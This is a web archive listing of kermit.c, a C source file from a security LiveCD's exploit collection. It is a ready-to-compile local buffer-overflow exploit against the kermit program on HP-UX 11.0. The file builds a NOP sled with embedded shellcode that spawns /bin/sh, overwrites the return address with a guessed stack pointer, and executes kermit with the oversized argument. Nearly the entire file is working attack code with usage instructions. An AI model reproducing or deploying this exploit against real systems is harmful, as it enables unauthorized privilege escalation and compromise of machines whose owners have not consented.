home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / hpux / local / kermit.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  72 lines
  1. /*      Copyright (c) 2000 ADM                                  */
  2. /*      All Rights Reserved                                     */
  3. /*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM      */
  4. /*      The copyright notice above does not evidence any        */
  5. /*      actual or intended publication of such source code.     */
  6. /*                                                              */
  7. /*      Title:        HP-UX kermit                              */
  8. /*      Tested under: HP-UX 11.0                                */
  9. /*      By:           K2                                        */
  10. /*      Use:          gcc -o kermit kermit.c ; ./kermit         */
  11. /*                    (more hp to come :)                       */
  12. /*                                                              */
  13.  
  14. #include <stdio.h>
  15. #include <stdlib.h>
  16. #include <sys/types.h>
  17. #include <unistd.h>
  18.  
  19. #define BUF_LENGTH 12000
  20. #define STACK_OFFSET 13400
  21. #define EXTRA 11500
  22. #define HPPA_NOP 0x0b390280
  23.  
  24. u_char hppa_shellcode[] =
  25. "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
  26. "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
  27. "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
  28.  
  29. u_long get_sp(void)
  30. {
  31.    __asm__("copy %sp,%ret0 \n");
  32. }
  33.  
  34. int main(int argc, char *argv[])
  35. {
  36.    char buf[BUF_LENGTH + 8];
  37.    unsigned long targ_addr;
  38.    u_long *long_p;
  39.    u_char *char_p;
  40.    int i, code_length = strlen(hppa_shellcode),dso=STACK_OFFSET,xtra=EXTRA;
  41.  
  42.    if(argc > 1) dso+=atoi(argv[1]);
  43.    if(argc > 2) xtra+=atoi(argv[2]);
  44.     
  45.    long_p = (u_long *) buf ;
  46.  
  47.    for (i = 0; i < (BUF_LENGTH - code_length - xtra) / sizeof(u_long); i++)
  48.      *long_p++ = HPPA_NOP;
  49.  
  50.    char_p = (u_char *) long_p;
  51.    char_p--;
  52.  
  53.    for (i = 0; i < code_length; i++)
  54.      *char_p++ = hppa_shellcode[i];
  55.  
  56.    targ_addr = get_sp() - dso;
  57.  
  58.    for (i = 0; i < ((xtra /4)); i++)
  59.    {
  60.       *char_p++ =(targ_addr>>24)&255;
  61.       *char_p++ =(targ_addr>>16)&255;
  62.       *char_p++ =(targ_addr>>8)&255;
  63.       *char_p++ =(targ_addr)&255;
  64.     }
  65.  
  66.    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",targ_addr,strlen(buf),xtra,dso);
  67.  
  68.    execl("./k","k","-Y",  buf, (char *) 0); /* make a symlink or something in /tmp */
  69.    perror("execl failed");
  70.    return(-1);
  71. }
  72. /*                   www.hack.co.za  [21 march 2001]*/